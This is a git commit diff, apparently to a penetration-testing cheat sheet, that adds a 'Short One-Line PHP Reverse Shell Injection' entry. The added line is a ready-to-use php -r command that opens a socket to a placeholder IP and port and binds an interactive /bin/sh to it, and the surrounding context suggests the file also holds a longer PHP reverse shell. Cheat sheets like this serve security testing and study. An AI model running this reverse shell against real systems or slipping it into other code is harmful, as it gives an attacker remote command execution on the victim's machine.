Added one-liner php shell

This commit is contained in:
Phil 2022-01-01 17:57:46 +00:00
parent 26eabd4925
commit 7f3184d9ef

View File

@ -327,6 +327,13 @@ function printit ($string) {
?>
```
* Short One-Line PHP Reverse Shell Injection
```
php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
```
#### Built-in Tools
| Program | Command |